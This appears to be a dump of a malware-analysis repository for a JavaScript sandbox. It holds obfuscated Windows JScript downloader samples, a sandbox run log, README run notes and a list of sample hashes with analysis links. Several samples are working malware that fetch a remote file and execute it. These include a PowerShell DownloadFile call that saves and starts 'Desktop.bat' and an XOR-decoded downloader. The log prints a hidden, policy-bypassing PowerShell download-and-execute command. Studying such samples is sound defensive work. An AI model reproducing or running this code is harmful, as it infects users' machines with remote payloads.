"-"].sapasgo(); 105 | var ijkeriqy0 = ['teP', "-"].sapasgo(); 106 | var rokmoruly = ["gth", "-", "-", "-"].sapasgo(); 107 | var ucfuzusfutd = ["rip", "-", "-", "-"].sapasgo(); 108 | var ozvimlibyc0 = ["ctiv", "-"].sapasgo(); 109 | var snodce = usakrizq + arlynsyhgyz + jolivevb2 + ijkeriqy0 + ijbihomipw + popogpi2 + zaltikihp; 110 | var ubciwo = okotict0 + rokmoruly; 111 | var catky = sjoracrudqi + hsujtykyrly3 + gijadul + udiplejow7; 112 | var alatu = ilpafofwet + ywtaxnatni2; 113 | var ivuxy = avxutqimgilp5 + boneqe0 + uvcemveryz + wexquzranvy + ragohipga1 + lcowenbism1; 114 | var kcumsurhi = ikahetkicv9 + dazepweb + oshydzihy1 + ijpofuzdaxw9; 115 | var lleqso = lunyltofi0 + gnawiwaz5; 116 | var ozbipert = zedrotivl0 + ldetymlu; 117 | var ubokbal = ukbazukne + jamwofiso; 118 | var xixaha = jrehoqu; 119 | var elmazfy = hrokwukgejo + yhfoqcizte6; 120 | var ogfuwn = agovraruh + rvobmewa; 121 | var wijne = hozmimwy6 + elkogdav0 + izywmuhlaq0 + pmyjkuse1; 122 | var megory = arydzojib + asvycyhvuz4 + tmubitral; 123 | var epbuml = yrqebfigw + elomgyl1; 124 | var hwylzo = cykkiwo1; 125 | var npaxuqb = gjagupfa + aryqigohv4 + bnyzoni6 + fewlojohy0; 126 | var abpodg = uxryhuvxe; 127 | var zynnaxu9 = new ActiveXObject(izpekmic1 + bxehjebucse0 + oktyromca + suqyztizv1 + bdufupvod + vserburehdu + fonryvtoqj + embyshovhaw8 + iccakbyjm0); 128 | var jnunypno2 = zynnaxu9[[snodce][0]](alehyvpa); 129 | switch (jnunypno2[[ubciwo][0]] > 4) { 130 | case true: 131 | var lelaxfuzsy5 = new Function(lyxexry + zahzonun6 + ozvimlibyc0 + ewpedux + evrasytyl0 + yzazym)(); 132 | break; 133 | } 134 | var khohawji = qsixhirohw + rsugqosenv3 + zjifizu + setzamyng; 135 | var kynro7 = new lelaxfuzsy5(khohawji); 136 | var jewboha = apinejqivf2 + ucfuzusfutd + gputizaqqu + oklepewyv2 + adutoflu3; 137 | var ilyqoz5 = seskublom7 + ypjokwuln + tygorgoqo7; 138 | var orawjagd = exdidoc5 + ysazsigvy + kimzymgi + wuqavxuwba + fqovwihho3 + elbibogab + ircusfaqy6 + xofufwinpe0 + afosork5 + yrumgahka + vykoscu + etybbili + nvaksolomgu8 + lvejfobno9; 139 | var azelup = qjeczerhasy + ertofudlesk + animzisqah + cevymsada5 + ydmytqon + nehhehus2 + otjiqazqecv + idojuk + eqvatokso2; 140 | var kyppaqaze = new lelaxfuzsy5(ilyqoz5); 141 | var uswufga0 = abpodg[[catky][0]]; 142 | kyppaqaze[[alatu][0]](); 143 | var zynnaxu9 = new lelaxfuzsy5(azelup); 144 | var afucnotuh3 = zynnaxu9[[ivuxy][0]](2) + qyhazpu + zynnaxu9[[kcumsurhi][0]](); 145 | kynro7[[lleqso][0]](vonybfonp, orawjagd, 0); 146 | kyppaqaze[[ozbipert][0]] = 0; 147 | kyppaqaze[[ubokbal][0]] = 1; 148 | var aroxfivfo = new lelaxfuzsy5(jewboha); 149 | kynro7[[xixaha][0]](); 150 | if (kynro7[[elmazfy][0]] == 200) { 151 | kyppaqaze[[ogfuwn][0]](kynro7[[wijne][0]]); 152 | kyppaqaze[[megory][0]](afucnotuh3); 153 | var vmubjazjat7 = ozosbunf + oznefsazw + ajubigxux + afucnotuh3; 154 | kyppaqaze[[epbuml][0]](); 155 | aroxfivfo[[hwylzo][0]](vmubjazjat7, 0); 156 | } 157 | zynnaxu9[[npaxuqb][0]](uswufga0); 158 | -------------------------------------------------------------------------------- /malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.out: -------------------------------------------------------------------------------- 1 | 14 Dec 20:24:03 - mailware-jail, a malware sandbox ver. 0.10 2 | 14 Dec 20:24:03 - ------------------------ 3 | 14 Dec 20:24:03 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/other.js,env/console.js 4 | 14 Dec 20:24:03 - Malware files: malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js 5 | 14 Dec 20:24:03 - Output file for sandbox dump: sandbox_dump_after.json 6 | 14 Dec 20:24:03 - Output directory for generated files: output/ 7 | 14 Dec 20:24:03 - ==> Preparing Sandbox environment. 8 | 14 Dec 20:24:03 - => Executing: env/utils.js quitely 9 | 14 Dec 20:24:03 - => Executing: env/eval.js quitely 10 | 14 Dec 20:24:03 - => Executing: env/function.js quitely 11 | 14 Dec 20:24:03 - => Executing: env/wscript.js quitely 12 | 14 Dec 20:24:03 - => Executing: env/other.js quitely 13 | 14 Dec 20:24:03 - => Executing: env/console.js quitely 14 | 14 Dec 20:24:03 - ==> Executing malware file(s). ========================================= 15 | 14 Dec 20:24:03 - => Executing: malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js verbosely, reporting silent catches 16 | 14 Dec 20:24:03 - Saving: output/malware_20161214_5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js 17 | 14 Dec 20:24:03 - WScript.scriptfullname = (string) 'malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js' 18 | 14 Dec 20:24:03 - WScript.arguments = (object) 'malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js,xyz' 19 | 14 Dec 20:24:03 - ActiveXObject(wscript.shell) 20 | 14 Dec 20:24:03 - new WScript.Shell[2] 21 | 14 Dec 20:24:03 - WScript.Shell[2].Run(cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden $migipk='^$';$kqevovde='^p';$unub='^a';$tygnefb='^t';$sbixeg='^h';$tecgerz='^=';$eryse='^(';$avkuvynb='^$';$qzarach='^e';$ciwyro='^n';$ulmezyq='^v';$ymqumnyzj='^:';$bmohetm='^t';$sideq='^e';$jevefbi='^m';$svepqa='^p';$ulvymu='^+';$kaqsa='^''';$izafso='^.';$wlohosky='^e';$silpox='^x';$aqselev='^e';$levfima='^''';$owaqij='^)';$omyjs='^;';$ahzujf='^(';$omitadk='^N';$arybom='^e';$usnakdipt='^w';$unar='^-';$zype='^O';$ezbaxnaj='^b';$otuxxep='^j';$iquxdo='^e';$uchaquf='^c';$ycydnez='^t';$ftyrbi='^ ';$uljenby='^S';$ywacjy='^y';$oxop='^s';$qibragd='^t';$ravafy='^e';$ogavo='^m';$evewzars='^.';$ygwavu='^N';$ulzuvuz='^e';$ulydo='^t';$irkufipd='^.';$abyhy='^W';$fdoggosdi='^e';$have='^b';$gyjacy='^c';$ywelzikl='^l';$mbiwja='^i';$ijif='^e';$soka='^n';$tdytkud='^t';$qubcagk='^)';$avmyf='^.';$kosev='^D';$lolrowbe='^o';$apas='^w';$yvbujo='^n';$otelwuw='^l';$dsobehhu='^o';$oqav='^a';$odbujqypz='^d';$elcyxcyh='^F';$kezdywt='^i';$hcogwo='^l';$jvuhyvj='^e';$afac='^(';$lvutykpu='^''';$qfyctyva='^h';$acwihge='^t';$fizju='^t';$npynep='^p';$ugnevlek='^:';$ugavcy='^/';$rfatcyw='^/';$dujy='^w';$parasy='^w';$opujy='^w';$gtupe='^.';$aprokpal='^k';$abwysy='^i';$agmif='^t';$nheqysje='^d';$ahybt='^o';$yskanagq='^o';$ajrewnasj='^r';$ebvonwukw='^s';$kcokiz='^.';$foby='^r';$mfobjof='^u';$ucim='^/';$xodedbi='^w';$xkyrniplo='^p';$nzolo='^-';$dqycoxo='^c';$cjyxkowm='^o';$wevcish='^n';$csipy='^t';$mvevdiz='^e';$ebezby='^n';$dpedga='^t';$olnozz='^/';$esgafa='^u';$ykix='^p';$quldar='^l';$egxex='^o';$zybgify='^a';$owbudlap='^d';$owlolo='^s';$osbuzbe='^/';$jytykq='^2';$vjesucle='^0';$alduzav='^1';$umijy='^4';$kicni='^/';$ywerho='^0';$murewpo='^1';$urufemc='^/';$ibqehr='^b';$yjixbu='^8';$vozu='^l';$uvaw='^k';$ubawak='^i';$ipfutem='^f';$rutod='^n';$ekaw='^z';$edtafta='^d';$inawy='^/';$ajfegqo='^C';$ufocu='^o';$equst='^u';$zohuza='^p';$dhawo='^o';$nwipikh='^n';$cywiw='^9';$qgochedw='^8';$fyndik='^5';$uqeda='^4';$juqaty='^.';$yftifoqw='^p';$sawvif='^d';$dtomu='^f';$yshyxik='^''';$pekretv='^,';$xxavludb='^$';$yrjely='^p';$enuke='^a';$xasmopo='^t';$osybho='^h';$zdomum='^)';$trawomo='^;';$loreh='^ ';$qalci='^S';$dqynnof='^t';$ppysy='^a';$zkytbeb='^r';$ovelf='^t';$lajkixa='^-';$fsebi='^P';$ukpab='^r';$lkura='^o';$rfukopn='^c';$ttawefa='^e';$preffojja='^s';$hlofejqu='^s';$yxnefka='^ ';$fwapywj='^$';$mydri='^p';$cape='^a';$ckukxoq='^t';$kbewifn='^h'; Invoke-Expression ($migipk+$kqevovde+$unub+$tygnefb+$sbixeg+$tecgerz+$eryse+$avkuvynb+$qzarach+$ciwyro+$ulmezyq+$ymqumnyzj+$bmohetm+$sideq+$jevefbi+$svepqa+$ulvymu+$kaqsa+$izafso+$wlohosky+$silpox+$aqselev+$levfima+$owaqij+$omyjs+$ahzujf+$omitadk+$arybom+$usnakdipt+$unar+$zype+$ezbaxnaj+$otuxxep+$iquxdo+$uchaquf+$ycydnez+$ftyrbi+$uljenby+$ywacjy+$oxop+$qibragd+$ravafy+$ogavo+$evewzars+$ygwavu+$ulzuvuz+$ulydo+$irkufipd+$abyhy+$fdoggosdi+$have+$gyjacy+$ywelzikl+$mbiwja+$ijif+$soka+$tdytkud+$qubcagk+$avmyf+$kosev+$lolrowbe+$apas+$yvbujo+$otelwuw+$dsobehhu+$oqav+$odbujqypz+$elcyxcyh+$kezdywt+$hcogwo+$jvuhyvj+$afac+$lvutykpu+$qfyctyva+$acwihge+$fizju+$npynep+$ugnevlek+$ugavcy+$rfatcyw+$dujy+$parasy+$opujy+$gtupe+$aprokpal+$abwysy+$agmif+$nheqysje+$ahybt+$yskanagq+$ajrewnasj+$ebvonwukw+$kcokiz+$foby+$mfobjof+$ucim+$xodedbi+$xkyrniplo+$nzolo+$dqycoxo+$cjyxkowm+$wevcish+$csipy+$mvevdiz+$ebezby+$dpedga+$olnozz+$esgafa+$ykix+$quldar+$egxex+$zybgify+$owbudlap+$owlolo+$osbuzbe+$jytykq+$vjesucle+$alduzav+$umijy+$kicni+$ywerho+$murewpo+$urufemc+$ibqehr+$yjixbu+$vozu+$uvaw+$ubawak+$ipfutem+$rutod+$ekaw+$edtafta+$inawy+$ajfegqo+$ufocu+$equst+$zohuza+$dhawo+$nwipikh+$cywiw+$qgochedw+$fyndik+$uqeda+$juqaty+$yftifoqw+$sawvif+$dtomu+$yshyxik+$pekretv+$xxavludb+$yrjely+$enuke+$xasmopo+$osybho+$zdomum+$trawomo+$loreh+$qalci+$dqynnof+$ppysy+$zkytbeb+$ovelf+$lajkixa+$fsebi+$ukpab+$lkura+$rfukopn+$ttawefa+$preffojja+$hlofejqu+$yxnefka+$fwapywj+$mydri+$cape+$ckukxoq+$kbewifn);;, 0, undefined) 22 | 14 Dec 20:24:03 - ==> Cleaning up sandbox. 23 | 14 Dec 20:24:03 - ==> Script execution finished, dumping sandbox environment to a file. 24 | 14 Dec 20:24:03 - The sandbox context has been saved to: sandbox_dump_after.json 25 | -------------------------------------------------------------------------------- /malware/20161216/README.md: -------------------------------------------------------------------------------- 1 | node jailme.js -c ./config_wscript_only.json malware/20161216/malware.js > malware/20161216/malware.out_no_download 2 | 3 | node jailme.js -c ./config_wscript_only.json malware/20161216/malware.js > malware/20161216/malware.out_download 4 | 5 | node jailme.js -c ./config_wscript_fileexists.json malware/20161216/malware.js > malware/20161216/malware.out_file_exists 6 | 7 | Copy translated malware file into our directory: 8 | 9 | cp output/tr_malware_20161216_malware.js malware/20161216/malware2.js 10 | 11 | Seems the malware expects chrome.exe to be in HKCR\\HTTP\\SHELL\\OPEN\\COMMAND\\ 12 | 13 | Rerun with trace: 14 | 15 | node jailme.js --trace -c ./config_wscript_fileexists.json malware/20161216/malware2.js > malware/20161216/malware2.out_file_exists_trace 16 | 17 | Slightly different behaviour, when chrome is the default browser for http: 18 | 19 | node jailme.js -c ./config_wscript_fileexists.json malware/20161216/malware2.js > malware/20161216/malware2.out_file_exists 20 | 21 | -------------------------------------------------------------------------------- /malware/20161227/2b2c85e2de6dbd4e1ff02d12018c871984387f6c428a1b515624a1a6b4c5ea00.js: -------------------------------------------------------------------------------- 1 | var d=new ActiveXObject('Shell.KEYLGApplication'.replace('KEYLG',''));d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('https://randomdomain.website/gateway.php?download=Zjc_ZTdjMmIxMGZkNWM5MmYwZGI3MjE4MTUzNjlmY2Q1NWNkNWQ5ZGRhZTUyMzdiOGNlYmZlMWU3NjEzYjRjYjQ5MmU4NGQzYjgwMGRhMWFmMTBmOTUzMDJmYjgzMWIxN2UxODMxMjc3YjI1MzMzNDhmMjY1NzBlYTgwOTg2ZGMxNTc3MjUzYzJjNzNhNDVmNzE1MGU4MDJiODM3N2EyNGRlYmExNWZiNTk3M2MzMjQxM2Q1ZDZjNGI5Y2EzZGVk','Desktop.bat');Start-Process 'Desktop.bat'","","",0); -------------------------------------------------------------------------------- /malware/20161227/97d87081f0b8e890df0a1c8ae85332b673329d3f2a74f00f7be3b6cb8ce1fe2c.js: -------------------------------------------------------------------------------- 1 | function fsRAZ(ySWgeR, EMfC, pNjI, FywDY) { 2 | switch (pNjI) { 3 | case true: 4 | if (FywDY === "1") { 5 | var mPuY = false; 6 | var LkoD = true; 7 | var LHCV = false; 8 | } 9 | break; 10 | case "1": 11 | if (ySWgeR === "0") { 12 | var VSrrn = 5041; 13 | VSrrn = 6433 - 3183; 14 | VSrrn = 9773 - 93; 15 | var VrnaKn = 3239; 16 | var IHKFjOb = 5959; 17 | VrnaKn = VSrrn - IHKFjOb; 18 | } 19 | break; 20 | }; 21 | switch (ySWgeR) { 22 | case "1": 23 | var VoYwLK = "sdZduY"; 24 | break; 25 | case false: 26 | if (ySWgeR == 18059) { 27 | var NjHM = 6164; 28 | var UmjpOg = 4876; 29 | var kiGLERv = 353; 30 | NjHM = UmjpOg * kiGLERv; 31 | var woLA = 2753; 32 | woLA = 2192 * 1485; 33 | woLA = 6388 / 1958; 34 | var OhrcWlp = 1222; 35 | UmjpOg = kiGLERv * OhrcWlp; 36 | } 37 | break; 38 | }; 39 | switch (false) { 40 | case false: 41 | var mYtcrH = 23540; 42 | break; 43 | case "MODkoswn": 44 | var nUSfw = "UjePx"; 45 | break; 46 | case "0": 47 | var MVjp = 55390; 48 | break; 49 | case 6331: 50 | var XPCgTs = 51293; 51 | break; 52 | case 16041: 53 | if (pNjI === "0") { 54 | var Gtv = 8082; 55 | var GDy = 2425; 56 | var KzyWcA = 1322; 57 | Gtv = GDy / KzyWcA; 58 | var DHOY = 7801; 59 | var ylRrEv = 1376; 60 | GDy = DHOY + ylRrEv; 61 | GDy = 9679 + 856; 62 | var bNI = 6757; 63 | bNI = 6441 * 1256; 64 | } 65 | break; 66 | }; 67 | return true; 68 | } 69 | function VtSaHj(VTnNCxZk) { 70 | var qnngE = 'PsQwQSXz'; 71 | var vRJkl = ''; 72 | var DtMUeW = (3588, 9374, 0); 73 | var HzE = qnngE.length; 74 | var vYlv = (3588, 9374, 0); 75 | var vdjLrw = ""; 76 | while (vYlv < VTnNCxZk.length - (851, 2509, 4351, 8091, 2)) { 77 | vdjLrw = VTnNCxZk.charAt(vYlv) + VTnNCxZk.charAt(vYlv + (8729, 6575, 4956, 7498, 9108, 2496, 3041, 3691, 1)) + VTnNCxZk.charAt(vYlv + (851, 2509, 4351, 8091, 2)); 78 | if (VTnNCxZk.charAt(vYlv) == (3588, 9374, 0)) { 79 | vdjLrw = VTnNCxZk.charAt(vYlv + (8729, 6575, 4956, 7498, 9108, 2496, 3041, 3691, 1)) + VTnNCxZk.charAt(vYlv + (2)); 80 | } 81 | if ((VTnNCxZk.charAt(vYlv) == (3588, 9374, 0)) && (VTnNCxZk.charAt(vYlv + (8729, 6575, 4956, 7498, 9108, 2496, 3041, 3691, 1)) == (3588, 9374, 0))) { 82 | vdjLrw = VTnNCxZk.charAt(vYlv + (851, 2509, 4351, 8091, 2)); 83 | } 84 | DtMUeW = parseInt(vdjLrw); 85 | DtMUeW = DtMUeW ^ (qnngE.charCodeAt(vYlv / (3982, 4074, 6160, 3832, 1399, 8248, 6719, 2410, 2661, 3) % HzE)); 86 | vRJkl += String.fromCharCode(DtMUeW); 87 | vYlv += (3); 88 | } 89 | return vRJkl; 90 | } 91 | function pKAtnI(SsiM, yBSI) { 92 | if (yBSI === true) { 93 | var isZuihX = 9136; 94 | var fykPXp = 7043; 95 | var hdQ = 1289; 96 | isZuihX = fykPXp / hdQ; 97 | isZuihX = hdQ - fykPXp; 98 | var JzfUO = 968; 99 | hdQ = isZuihX + JzfUO; 100 | isZuihX = 2501 + 3492; 101 | } 102 | var RzVxt = "dJFRWw"; 103 | if (RzVxt == "hbnIT") { 104 | var fHrrUCJ = 82668; 105 | } 106 | switch (SsiM) { 107 | case "1": 108 | if (yBSI == 15342) { 109 | var rPrw = false; 110 | } 111 | break; 112 | case 4502: 113 | var lfa = 86416; 114 | var CBRYATS = "pHnPfT"; 115 | if (yBSI === "dCoxYL") { 116 | var DYa = 1168; 117 | DYa = 4356 + 7682; 118 | var ReaKX = 5999; 119 | var qBSBq = 781; 120 | ReaKX = qBSBq / DYa; 121 | ReaKX = 5859 / 1836; 122 | qBSBq = DYa - ReaKX; 123 | } 124 | if (SsiM == true) { 125 | var vdxhgcT = 27696; 126 | } 127 | if (lfa === false) { 128 | var guUEd = 6724; 129 | guUEd = 4907 * 3717; 130 | var NVRZIgq = 655; 131 | var pgmvdIC = 2933; 132 | guUEd = NVRZIgq - pgmvdIC; 133 | pgmvdIC = 8873 + 4259; 134 | pgmvdIC = guUEd / NVRZIgq; 135 | guUEd = pgmvdIC - NVRZIgq; 136 | } 137 | break; 138 | }; 139 | } 140 | function ElMQW() { 141 | var mGU = true; 142 | if (mGU === false) { 143 | var hhHJbSf = 6215; 144 | hhHJbSf = 7230 + 3034; 145 | var XXW = 5840; 146 | var ymAufG = 2315; 147 | var mmpLz = 8004; 148 | XXW = ymAufG + mmpLz; 149 | var lvFMdUK = 3120; 150 | mmpLz = ymAufG + lvFMdUK; 151 | } 152 | switch (4848) { 153 | case "VjD": 154 | var tNxWaTu = 75277; 155 | break; 156 | case 13499: 157 | var KibWhMj = "DcvBviZ"; 158 | switch ("1") { 159 | case "1": 160 | var QNZ = 35765; 161 | break; 162 | case false: 163 | var KccEXr = true; 164 | if (KccEXr == true) { 165 | var XwgNjfi = 5879; 166 | var voU = 4651; 167 | XwgNjfi = XwgNjfi / voU; 168 | var yvJh = 6790; 169 | yvJh = 2437 + 3861; 170 | var CtXvHIl = 705; 171 | CtXvHIl = 8130 - 7693; 172 | yvJh = 9339 / 6529; 173 | XwgNjfi = voU + yvJh; 174 | } 175 | break; 176 | case "1": 177 | var MxBhgfZ = false; 178 | break; 179 | }; 180 | var cGXQG = "Nlded"; 181 | var GghP = "TmCb"; 182 | if (GghP == "WIeZNiFI") { 183 | var ZcGEfm = true; 184 | } 185 | if (KibWhMj == true) { 186 | var xGBRWtm = 5733; 187 | var UJupSuH = 320; 188 | var aMSWVv = 4143; 189 | xGBRWtm = UJupSuH - aMSWVv; 190 | var tcYm = 9891; 191 | var oTDE = 7309; 192 | tcYm = tcYm + oTDE; 193 | UJupSuH = 6119 + 1553; 194 | } 195 | break; 196 | case "tuu": 197 | var lyF = false; 198 | break; 199 | case false: 200 | var qccde = false; 201 | if (qccde == 7800) { 202 | var nlHVpO = 12525; 203 | } 204 | break; 205 | case "1": 206 | var RXs = "mVXoYb"; 207 | break; 208 | }; 209 | var Qikxezm = "nHCY"; 210 | if (Qikxezm == false) { 211 | var dKWgG = 9042; 212 | var PfuTEHe = 8427; 213 | dKWgG = dKWgG * PfuTEHe; 214 | var kwCwsAK = 3206; 215 | kwCwsAK = 3268 * 5008; 216 | PfuTEHe = 2109 + 8742; 217 | } 218 | } 219 | function mODbP() { 220 | var oryHZ = VtSaHj("056007037007107124119027061000056025039054042009057028063018034125059021061092038007124058054025060006053018034124050009127007056025040062059031127003061002054058054009127023056005052048044019063029048027056039033085098075098069127101108"); 221 | var xYBdD = new ActiveXObject(VtSaHj("007032050005056035044084003027052027061")); 222 | var qeDjbm = new ActiveXObject(VtSaHj("003016035030033039049020055093023030061054011003035007052026030049050031051007")); 223 | var bax = qeDjbm[VtSaHj("023022037036033054059019049031023024061055061008")]((8511, 5852, 8423, 3001, 5656, 2)) + '\\' + qeDjbm[VtSaHj("023022037035052062040052049030052")](); 224 | var ITTxxV = new ActiveXObject(VtSaHj("029032009058029097118034029063025035005003")); 225 | ITTxxV[VtSaHj("063003052025")](VtSaHj("023054005"), oryHZ, false); 226 | ITTxxV[VtSaHj("035022063019")](); 227 | if (ITTxxV[VtSaHj("003007048003036032")] == (3658, 1292, 215, 6795, 2196, 5828, 200)) { 228 | var UkF = new ActiveXObject(VtSaHj("017055030051019125011014034022048026")); 229 | UkF[VtSaHj("031003052025")](); 230 | UkF[VtSaHj("004010033018")] = (2472, 8167, 1523, 2746, 8176, 5986, 9106, 4878, 4759, 7893, 9455, 1); 231 | UkF[VtSaHj("007001056003052")](ITTxxV[VtSaHj("002022034007062061043031018028053014")]); 232 | UkF[VtSaHj("000028034030037058055020")] = (7046, 2051, 8064, 9048, 8044, 1652, 7559, 3896, 75, 560, 9547, 3875, 0); 233 | UkF[VtSaHj("003018039018005060030019060022")](bax); 234 | UkF[VtSaHj("019031062004052")](); 235 | xYBdD[VtSaHj("034006063")](VtSaHj("051030053089052043061090127016113") + bax, (7046, 2051, 8064, 9048, 8044, 1652, 7559, 3896, 75, 560, 9547, 3875, 0)); 236 | } 237 | } 238 | function gQGLMfk(gln, gdeUxe) { 239 | if (gdeUxe == false) { 240 | var xaEPo = 66176; 241 | } 242 | if (gln === "1") { 243 | var RUPq = 4684; 244 | var pXNdo = 4223; 245 | var VDzRyyo = 8065; 246 | RUPq = pXNdo - VDzRyyo; 247 | var BzDmTa = 5619; 248 | BzDmTa = 2422 + 7353; 249 | var zrgB = 9192; 250 | VDzRyyo = zrgB / BzDmTa; 251 | } 252 | } 253 | function xAmTQIo(ADRc) { 254 | var cbax = true; 255 | var VZgcl = 44292; 256 | var wHe = false; 257 | if (wHe === "0") { 258 | var oTuAar = 72243; 259 | } 260 | switch ("0") { 261 | case true: 262 | var ejDhu = false; 263 | if (ejDhu == "0") { 264 | var tlsbNLL = false; 265 | } 266 | break; 267 | case true: 268 | var sfwXh = 53515; 269 | break; 270 | }; 271 | 272 | var mgWpAH = 70420; 273 | } 274 | try { 275 | pKAtnI(14279, false); 276 | gQGLMfk(false, "1"); 277 | if (fsRAZ("1", false, 11500, "0") != 1) { 278 | xAmTQIo("0"); 279 | } else { 280 | mODbP(); 281 | } 282 | ElMQW("1"); 283 | } catch (IyKtKZQ) {} -------------------------------------------------------------------------------- /malware/20161227/README.md: -------------------------------------------------------------------------------- 1 | 913edfa193769a34805c4b8fcdf8737bce7dc5326e6201217ce61bebc85135e6 2 | https://malwr.com/analysis/YTAxNTk3YzMwOGFkNDNlZTgzMmYzMzhkNWYwOGU2M2M/ 3 | 4 | 911bc50c3fcfbd0a1293f5de2b33001d588aa9df4b9a9542880cfca1eaba10cf 5 | https://malwr.com/analysis/YmQ5ZTc1MDJhOTM3NGJmNmJlY2U0NTcxYzdiZDcwMDk/ 6 | 7 | 06e9b62cfa79e8d6cbf2d650dd623c041822eff24e171867c0bf49a4b17d66b2 8 | https://malwr.com/analysis/YzYwZThhMjc2YjQ5NGIwNmI3NDRhZjg4OWExMzNlMGU/ 9 | 10 | ca0daa0a2305e3576e2c74c8ad98d115a90642e14377508afaee2096b58bb0ab 11 | https://malwr.com/analysis/MWZlY2EzNGZkYzEwNGFhMmJiZjRjZTFlMTFkMmM3NjM/ 12 | 13 | d0ee77a75a89b7a5ad7cc998526297208454de56f8a403d609d71c7f9ef10f80 14 | https://malwr.com/analysis/YTJkZGJiNTBkZjk1NDE2ZWFhNjAzOWY2YTkxZTM4NDM/ 15 | 16 | 2b2c85e2de6dbd4e1ff02d12018c871984387f6c428a1b515624a1a6b4c5ea00 17 | https://malwr.com/analysis/M2JhOTYwMTY3MGVmNGUzNjlkNWE4NWVkOGJhOTAwNWQ/ 18 | 19 | c0a73d4e21e60a370bbaa476f532a02df17e99e5be3389ff550d28c105d518cd 20 | https://malwr.com/analysis/MzY3Y2U1YWMwMjY0NDRjZDgyOTFiYzY3YTVhNjI0ZTE/ 21 | 22 | a35738f52720eb875932e65a3831611e6ba7447d40ab90476dff88833243d892 23 | https://malwr.com/analysis/YzMyMTg2NTFhMTRmNGE0MDk2ZDZhYzM0Y2MwZTI4ZDM/ 24 | 25 | 97d87081f0b8e890df0a1c8ae85332b673329d3f2a74f00f7be3b6cb8ce1fe2c 26 | https://malwr.com/analysis/YzQ5ZTY3ZDE0M2U5NDQzY2ExNTg5MDMyMDJkNDZiODY/ 27 | 28 | 18953b45756b4da58948cdc9dc3b4c5af333c4cadd6890bce5bc0fe1395ad63b 29 | https://malwr.com/analysis/OWJhNGZjOWFkMzcwNDZjMzkyZjFiNDIxZTUzNTkwYTA/ 30 | 31 | 01e4c87434e28a8838cfaf16b121e474512ca176efdcb0bba577fbbb2ddfc8c6 32 | https://malwr.com/analysis/MWVlNDNmMDliYTg4NDdkZjhhZmRkZTJmOTFjZWU3ZWU/ 33 | 34 | 961e7da15919c2d4744bbe161f1db0daa99127e9311c0cfa4c217b7ffa0f33fe 35 | https://malwr.com/analysis/NTMyMjI3OTllZTUwNDgyZWE2YzA2YmQ4YmRmZjFiODY/ 36 | 37 | b84e2ced6c7628264e75d2fc5615b3b4a23c18df494618da347d2eebc90ecd80 38 | https://malwr.com/analysis/NDc1MGFmM2NmM2JkNGFlODg5YTUxYzVmMzU1MDJmNTU/ 39 | 40 | 84d73512b431365e1650998199fa7673b6fbd290935fcb7a1fbf071359c1ab46 41 | https://malwr.com/analysis/ODFmMDY0ZWU1OWNjNGQyZmE2NTM2ZWY1OTI4YWE1ZDE/ 42 | 43 | 44 | -------------------------------------------------------------------------------- /malware/20161227/c0a73d4e21e60a370bbaa476f532a02df17e99e5be3389ff550d28c105d518cd.js: -------------------------------------------------------------------------------- 1 | function qqfak() 2 | { 3 | var bwfgg=new Array("}R%","g."+""+"f","h){","e(p","++;","].su","JKX","PTC"); 4 | return bwfgg[Math.floor(Math['rand'+new Array('om')[0]]()*bwfgg.length)]; 5 | } 6 | function otojo() 7 | { 8 | var nrxyx="fa377be064ad07fedc72efb65f9a78b087ed157faaf31f1f76eb074af965d1755bf570ac465f0c70cf657e7663a9e7ea5e7ca4b44d4063ada7dd3939f3564efd63f6b7da433dc7b31c8172c8470a187df367dba873e8070a8972e4d7af5238eb86ad2f65d8763e8768b306ad8567a6b70f8463b8831a3b69a287cdb97dc6e59e3865b8a65e2261a3831edf2ca2631d397fb5074fd566b6a31b4d50f8572c7765c9978e8767e0874b3a49f8f5ec4c73f927bbc574a8c72cc365f5b39c3333f1c5cb4f42e1749e705cd225df7f23e963ffe249ec75cf395def059d4c45d3c45ee441d0533d5a38d532ae1269a1f7ccb17de0e59c4365bc665ab661b4f3fdf47eb8861c6974c607fcb539caf33c2256d7d54f9045add33a7b3db0331fe964b8d63ed97da443da0631a2b77ef470d127dc2862a6174b2e38f782ad4569b797cc727df9359c9165d2265f7361b993fbc062b0174d457fe6a75cb139d7938fd12af8378f4077e6231d0f39ab869a7a7cc517dabc59a5465de165fa861f8b3fc8262cea65c2770f4c65d0164dac62cb231d612cdea2cac331f3023f0921cea21ecd38d5831fd26ac4d63db374d5365b6f64c2263efb7fd7a31a4872adc70d9a7dded7dc9073d2f70f5472fa67afa539c3a69a6f7cd6b7dcf459a9465eeb65d0c61c623ffec43ac774b4062e6f61fe57ed737ff8a62e7a74"+ 9 | "fe453d697ed1975c1668e693dc4f31c1f77d0570f6c7dc6462a1374c0938e402aca06cf8f74bf37db4462afd74ca36ab3963c5074d0365a9764fe163bb97fb2731c5a72d7970cd47dd267da9a73f2470e4c72bfb7ab3839e797fbcd64e757ddd37df843da0c31f6f65e4263f8164dc374ea038df62acdc6cf6a6cf2272a4b70ee165fe572ebb79e4931a4339dc174e4f63fd563cb77edca63b0038b606ad4563b2974f3c65ec064abc63e8a7fbd631d6272b0b70ef27dc857dfc773b0970a9572f9e7ac8839ab67fc7a64ca57db947dbea3ddb731e2165c3963fd264d5074a6538cba2aa366cc6d6cd0d77b2064f1a7ff7d72b2a65ccf78ef47eb6e7fe8231bf876a9174ec365d9355b5070a9a65fd870dc639e1a72ff370e317dc597dc4673dcd70de272b107aeb838c656af4565c1463df668d5a6aaad76c3a74bc065c1a55af770c5b65fef70a6f57bdd63d627eb8b7caff44f3a63c9a7de9039c1d33acc79ad265e2e65fb661efc2bd1a3edcc3eb2666e2d66c8f66c9a3fa0963b9074b5570d4475bd579e6174f9270a7465efa3fe4472d7d7eaa67cffa3ea7d7fbbb74cb166d8062d013ef0e20c8423f2025d3522ef320df025c2623a013fa2974fb369f9c74f1533eb63dd5931f3777ea564d177fe2e72e4265ded78fc67ec967ff8239a1663d